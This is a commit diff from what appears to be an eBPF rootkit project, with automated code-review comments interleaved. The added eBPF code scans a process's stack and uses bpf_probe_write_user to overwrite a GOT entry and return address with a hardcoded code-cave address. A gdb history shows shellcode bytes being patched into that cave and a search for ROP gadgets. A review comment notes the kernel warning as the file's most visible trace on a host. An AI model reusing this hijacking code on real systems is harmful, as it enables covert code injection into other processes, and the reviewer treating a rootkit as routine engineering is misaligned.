Updated helpers and added resources to help with lib injection

h3xduck
2022-03-24 15:40:05 -04:00
parent 9dff5e71dc
commit 8f28c3a883
18 changed files with 12112 additions and 10036 deletions





@@ -19,7 +19,7 @@
#define STRING_FS_SUDOERS_ENTRY_LEN 37
//EXECUTION HIJACKING
#define PATH_EXECUTION_HIJACK_PROGRAM "/home/osboxes/TFG/src/helpers/execve_hijack\0"
#define PATH_EXECUTION_HIJACK_PROGRAM "/home/osboxes/TFG/src/helpers/execve_hijackdeactivated\0"
//LIBRARY INJECTION WITH ROP
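Review bot: The explicit `\0` at the end of the new `PATH_EXECUTION_HIJACK_PROGRAM` literal is redundant, since a C string literal already carries its terminator, so the macro now embeds two; unless some consumer depends on that extra byte, write `#define PATH_EXECUTION_HIJACK_PROGRAM "/home/osboxes/TFG/src/helpers/execve_hijackdeactivated"`. Switching the feature off by pointing the macro at a path that presumably does not exist leaves the intent implicit, and the commit message does not record it either; a short comment on the line saying that this value is the "disabled" setting would spare the next reader a search for a missing file.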


@@ -14,6 +14,7 @@
#define OPCODE_JUMP_BYTE_0 0xe8
#define GLIBC_OFFSET_MAIN_TO_SYSCALL 0xf00d0
#define GLIBC_OFFSET_MAIN_TO_DLOPEN 0x12f120
#define CODE_CAVE_ADDRESS 0x0000000000402e95
struct sys_timerfd_settime_enter_ctx {
unsigned long long unused; //Pointer to pt_regs
@@ -66,7 +67,7 @@ static __always_inline int stack_extract_return_address_plt(__u64 stack){
//bpf_printk(" -- Failed OPCODE: %x\n", opcode_arr[0]);
return -1;
}
//We have localized the call instruction and thus quite probably the saved RIP.
//We proceed to get the offset of the call.
__u32 offset;
@@ -121,6 +122,21 @@ static __always_inline int stack_extract_return_address_plt(__u64 stack){
}
bpf_probe_read_user(&got_addr, sizeof(__u64), j_addr);
bpf_printk("GOT_ADDR: %lx\n",got_addr);
__u64 buf = CODE_CAVE_ADDRESS;
bpf_printk("Now writing to J_ADDR %lx\n", j_addr);
if(bpf_probe_write_user(j_addr, &buf, sizeof(__u64))<0){
bpf_printk("FAILED TO WRITE J\n");
}else{
__u64 got_addr_new;
bpf_probe_read_user(&got_addr_new, sizeof(__u64), j_addr);
bpf_printk("Success, new GOT is %lx", got_addr_new);
}
bpf_printk("Now writing to CALL_ADDR %lx\n", call_addr);
if(bpf_probe_write_user(call_addr, &buf, sizeof(__u64))<0){
bpf_printk("FAILED TO WRITE CALL\n");
}
//Now that we have the address placed in the GOT section we can finally go to the function in glibc
//where the syscall resides. We read the opcodes and check that they are the ones expected
__u8 s_opcode[14];
@@ -180,7 +196,7 @@ int sys_enter_timerfd_settime(struct sys_timerfd_settime_enter_ctx *ctx){
__u64 address = 0;
bpf_printk("Timer %i to scan at address %lx\n", fd, scanner);
#pragma unroll
for(__u64 ii=0; ii<100; ii++){
for(__u64 ii=0; ii<200; ii++){
//We got a foothold in the stack via the syscall argument, now we scan to lower memory
//positions assuming those are the saced RIP. We will then perform checks in order to see
//if it truly is the saved RIP (checking that there is a path to the actual syscall).
@@ -210,7 +226,7 @@ int sys_enter_timerfd_settime(struct sys_timerfd_settime_enter_ctx *ctx){
}
}
bpf_printk("Finished without findings\n");
return 0;
@@ -272,6 +288,7 @@ int uprobe_execute_command(struct pt_regs *ctx){
}
//bpf_printk("Stack: %x\n", dest_buf);
return 0;
}
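Review bot: In the @@ -121 hunk the return value of `bpf_probe_read_user(&got_addr_new, sizeof(__u64), j_addr)` is ignored, as is the read into `got_addr` on the context line just above the new code, so the two `bpf_printk` calls that report those values print something even when the read failed; as far as I recall the helper zero-fills its destination on error, which makes a failure look like a plausible value of 0, so guard it with `if (bpf_probe_read_user(&got_addr_new, sizeof(__u64), j_addr) < 0) { bpf_printk("Read back of GOT failed\n"); }` and do the same for the earlier read. `CODE_CAVE_ADDRESS` in the first hunk is a bare absolute address with no comment saying which binary and build it was measured from, so a one-line comment naming its origin would stop it being silently reused against a different layout. The two `bpf_probe_write_user` calls deserve a note in the file header as well: the kernel emits a rate-limited warning naming the loading task whenever a program that uses that helper is installed, so it is the most visible trace this file leaves on a host. `stack_extract_return_address_plt` starts before the hunk and continues after it, so I cannot see how the return value of this path is consumed.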


@@ -1,172 +1,256 @@
disass main
checksec bof
checksec
quit
disass test_time_values_injection
disass test_time_values_injection+74
b test_time_values_injection+74
b test_time_values_injection + 74
b *(test_time_values_injection + 74)
r
si
si
si
si
q
b timerfd_settime
find 0x00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 0x401000 0x403000
b *(test_time_values_injection+77 )
r
context
q
disass test_time_values_injection
b *(test_time_values_injection +74)
r
si
si
q
b test_time_values_injection +74
b (test_time_values_injection +74)
b *(test_time_values_injection +74)
r
si
display/i $pc
si
si
si
q
disass test_time_values_injection
b *(test_time_values_injection +116)
r
si
si
q
b *(test_time_values_injection +116)
r
si
d/i 0x405130
d/i2 0x405130
display/i2 0x405130
display/i 0x405130
display/i4 0x405130
display/2i 0x405130
display/10i 0x405130
disassemble /r 0x405130
disassemble /r 0x6095d8f7ff7f
disassemble /r 0x6095d8f7ff7f00
disassemble /r 0x6095d8f7ff7f0000
disassemble /r 0x6095d8f7ff7f00007612
disassemble /r 0x6095d8f7ff7f000076
disassemble /r 0x6095d8f7ff7f0000
disassemble /r 0x00007ffff7d89560
d/10i 0x00007ffff7d89560
context
disassemble /r 0x405130
d/10i 0x7ffff7d89560
disassemble 0x7ffff7d89560
disassemble /r 0x7ffff7d89560
disassemble timerfd_settime
disassemble __libc_start_main
q
disass test_time_values_injection
b *(test_time_values_injection+74)
r
si
ni
si
disass timerfd_settime
b 0x00007ffff7d89560
b __timerfd_settime
c
find 0x00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 0x401000 0x403000
x/128i 0x402e95
x/128x 0x402e95
x/128x 0x402e90
x/128i 0x402e90
x/128i 0x402e89
x/10i 0x402e89
x/10i 0x402e90
x/10i 0x402e80
x/128i 0x402e89
x/256i 0x402e89
x/256i 0x402e90
find 0x90909090909090909090909090909090 0x401000 0x403000
context
x/10i 401520
x/10i 0x401520
x/10i 0x401260
x/10i 0x401250
q
r
disass /r 0x405130
x/10i 0x401520
q
b *(test_time_values_injection+77 )
disass /r test_time_values_injection
b *(test_time_values_injection+169)
r
b __timerfd_settime
c
x/10i 0x401250
x/10i 0x401260
x/10i 0x405130
x/10 0x405130
x/10x 0x405130
c
x/10x 0x405130
x/10i 0x405130
c
x/10i 0x405130
si
c
r
q
r
b *0x4013a8
r
r
r
b test_time_values_injection
r
s
q
b test_time_values_injection
r
b 0x4013a8
b *0x4013a8
b *0x4013a4
r
q
b *0x4013a8
r
b test_time_values_injection
r
n
q
b test_time_values_injection
r
n
ni
del 1
del 2
r
b test_time_values_injection
r
q
b __timerfd_settime
b timerfd_S
b timerfd_settime
r
q
b timerfd_settime
r
si
ni
disass timerfd_settime
disass /r timerfd_settime
q
b timerfd_settime
r
si
ni
disass /r timerfd_settime
r
si
ni
q
b timerfd_settime
r
si
ni
stack 200
q
b timerfd_settime
r
si
ni
d/10i 0x7ffff7d89560
d/i 0x7ffff7d89560
disassemble 0x7ffff7d89560
stack 30ç
d/6x 7fffffffdcc8
d/x 7fffffffdcc8
p/x 7fffffffdcc8
p/x 0x7fffffffdcc8
d/x 0x7fffffffdcc8
d/3x 0x7fffffffdcc8
d/3x *0x7fffffffdcc8
x/3x 0x7fffffffdcc8
x/5i 0x7fffffffdcc8
x/5x 0x7fffffffdcc8
x/20x 0x7fffffffdcc8
stack
p __libc_start_main
x/x __libc_start_main
stack
context
context_code
x/x __libc_start_main
q
b timerfd_settime
r
si
ni
x/x __libc_start_main
x/x __libc_dlopen_mode
rop
ropsearch 0f
ropsearch "0f"
ropsearch "0f" libc
ropsearch "pop %rax" libc
ropsearch "pop %rax"
ropsearch "pop %rax"
ropsearch "pop rax"
ropsearch "pop rax" libc
ropsearch "pop eax" libc
ropgadget
ropgadget libc
help ropgadget
help ropsearch
ropsearch "pop eax" libc
q
disass main
l test_time_values_injection
disass test_time_values_injection
b *(test_time_values_injection + 74)
q
r
q
si
b test_time_values_injection
r
b __timerfd_settime
r
c
del 1
x/10i 0x405130
c
r
b test
q
b test_time_values_injection
r
n
ni
si
ni
si
si
q
b test_time_values_injection
r
x/10x 0x402e95
x/10x 0x405130
checksecq
q
checksecq
checksec
q
checksec
q
q
q
q
x/10x 0x402e95
b test_time_values_injection
r
x/10x 0x402e95
x/10x 0x405130
b __timerfd_settime
c
x/10x 0x405130
c
x/10x 0x405130
q
b test_time_values_injection
r
b __timerfd_settime
c
si
x/10x 0x405130
disass test_time_values_injection
b *(test_time_values_injection+169 )
c
si
x/10x 0x402e95
q
b test_time_values_injection
r
b __timerfd_settime
c
x/10x 0x402e95
x/10x 0x405130
si
x/10x 0x405130
b *(test_time_values_injection+169 )
c
si
set *(int64_t *)0x402e95 0x10
set *(int64_t *)0x402e95 = 0x10
x/10x 0x405130
x/10x 0x402e95
set *(int64_t *)0x402e95 = 0x102131415161718191
set *(int64_t *)0x7ffff7d89560 =
x/10x 0x402e95
x/10i 0x402e95
x/10b 0x402e95
set *(int64_t *)0x402e95 = 0x50
x/10b 0x402e95
x/10i 0x402e95
x/10i 0x7ffff7d89560
set *(int64_t *)0x402e95 = 0x48B86095D8F7FF7F0000
set *(int64_t *)0x402e95 = 0x48B86095D8F7FF7F00
x/10i 0x402e95
x/10b 0x402e95
set *(int64_t *)0x402e95 = 0x48B86095D8F7FF7F
x/10b 0x402e95
x/10i 0x402e95
disass /r 0x402e95
disass 0x402e95
disass /r *0x402e95
x/10i 0x402e95
x/10x 0x405130
x/10i 0x405130
x/10i 0x401260
x/10b 0x401260
x/10i 0x402e95
x/10b 0x401260
x/10i 0x402e95
x/10b 0x402e95
set *(int64_t *)0x402e95 = 0x48B86095D8F7FF7F
set *(int64_t *)0x402e9d = 0xffe0
x/10b 0x402e95
context
si
x/10i 0x402e95
si
q
b test_time_values_injection
r
b *(test_time_values_injection+169)
r
c
x/10i 0x402e95
x/10b 0x401260
x/10x 0x405130
si
set *(int64_t *)0x402e95 = 0x48B86095D8F7FF7F
x/10b 0x402e95
x/10i 0x402e95
set *(int64_t *)0x402e95 = 0x48B86095D8F7FF7F
x/10b 0x402e95
set *(int64_t *)0x402e9d = 0x0000ffe0
x/10b 0x402e95
set 0x402e9d = 0xffe000000
x/10b 0x402e95
x/12b 0x402e95
x/10i 0x402e95
set 0x402e95 = 0x48B86095D8F7FF7F0000
set 0x402e95 = 0x48B86095D8F7FF7F
set *(int64_t *)0x402e95 = 0x48B86095D8F7FF7F
x/10b 0x402e95
x/14b 0x402e95
x/20b 0x402e95
set *(int64_t *)0x402e9d = 0x0000ffe0
x/20b 0x402e95
x/20i 0x402e95
x/20b 0x402e95
x/10i 0x401230
disass /r test_time_values_injection
x/10i 0x4013a0
x/10b 0x4013a0
x/20b 0x402e95
set *(int64_t *)0x402e9d = 0xffe000000
x/20b 0x402e95
set *(int64_t *)0x402e9d = 0xffe00000
x/20b 0x402e95
x/10i 0x4013a0
x/20i 0x402e95
x/20b 0x402e95
set *(int64_t *)0x402e95 = 0x7FFFF7D89560B848
x/20b 0x402e95
x/20i 0x402e95
set *(int64_t *)0x402e9d = 0xe0ff00000
x/20i 0x402e95
x/20b 0x402e95
set *(int64_t *)0x402e9d = 0xe0ff0000
x/20i 0x402e95
set *(int64_t *)0x402e95 = 0x7FFFF7D89560B848
x/20i 0x402e95
context
si
si
si
si
si
c
q


@@ -12,7 +12,7 @@ execve_hijack.o: execve_hijack.c $(HEADERS)
clang -g -c execve_hijack.c
execve_hijack: execve_hijack.o lib/libRawTCP_Lib.a
clang -lm -g -fno-plt -o execve_hijack execve_hijack.o -ldl -L. lib/libRawTCP_Lib.a
clang -lm -g -o execve_hijack execve_hijack.o -ldl -L. lib/libRawTCP_Lib.a
clean:
-rm -f execve_hijack.o
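Review bot: `-lm` still comes before `execve_hijack.o` on the new link line; with toolchains that default to `--as-needed`, a library named before the objects that reference it can be dropped from the link, so if libm is really needed it should follow them: `clang -g -o execve_hijack execve_hijack.o -ldl -L. lib/libRawTCP_Lib.a -lm`. Removing `-fno-plt` changes how the binary resolves its libc calls, and neither the Makefile nor the commit message says why; a comment on the rule recording the reason would keep a later edit from restoring the flag. `-L.` is also unused here because the archive is given by path rather than with `-l`.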



@@ -24,8 +24,8 @@
int test_time_values_injection(){
struct itimerspec new_value;
int max_exp, fd;
struct itimerspec new_value, new_value2;
int max_exp, fd, fd2;
struct timespec now;
uint64_t exp, tot_exp;
ssize_t s;
@@ -40,6 +40,16 @@ int test_time_values_injection(){
if (timerfd_settime(fd, TFD_TIMER_ABSTIME, &new_value, NULL) == -1)
return -1;
fd2 = timerfd_create(CLOCK_REALTIME, 0);
if (fd2 == -1)
return -1;
new_value2.it_interval.tv_sec = 30;
new_value2.it_interval.tv_nsec = 0;
if (timerfd_settime(fd2, TFD_TIMER_ABSTIME, &new_value2, NULL) == -1)
return -1;
printf("Timer %i started, address sent %llx\n", fd, (__u64)&new_value);
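Review bot: `new_value2` is only partially initialised before `timerfd_settime(fd2, TFD_TIMER_ABSTIME, &new_value2, NULL)`: the new lines set `it_interval` but never `it_value`, so the call reads indeterminate stack memory (undefined behaviour), and if those bytes happen to be zero the timer is disarmed instead of started. Zero the struct at its declaration in the first hunk, `struct itimerspec new_value, new_value2 = {0};`, and set `new_value2.it_value` explicitly, presumably from `now` as the first timer appears to do outside the hunk. The new early return after `timerfd_create` also leaks `fd`, mirroring the existing return just above it; `if (fd2 == -1) { close(fd); return -1; }` closes it, and the second return should close both descriptors. `test_time_values_injection` continues past the hunk, so I cannot see whether `fd2` is ever closed or read.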



@@ -1,7 +1,10 @@
#include <stdio.h>
#include <stdlib.h>
#include <syslog.h>
__attribute__((constructor))
static void init()
{
puts("It worked\n");
printf("It worked\n");
syslog(LOG_CRIT, "Library called\n");
}
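Review bot: `syslog(LOG_CRIT, "Library called\n")` carries a trailing newline that syslog does not need; the logger strips or escapes it, so it only adds noise to the record, and `syslog(LOG_CRIT, "Library called");` is enough. `static void init()` with empty parentheses is an old-style declaration in C that says nothing about the arguments; `static void init(void)` is the form meant here. `<stdlib.h>` is not used by anything visible in the hunk, so it can go unless code outside it needs it. A one-line comment above the constructor saying that it runs on load and what it is meant to signal would also help, since the file has no documentation at all.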




@@ -1,3 +1,4 @@
break timerfd_settime
break timerfd_settime
break test_time_values_injection
break __dlopen
break *(test_time_values_injection+169)


@@ -0,0 +1,5 @@
break test_time_values_injection
disable $bpnum
break *(test_time_values_injection+169)
disable $bpnum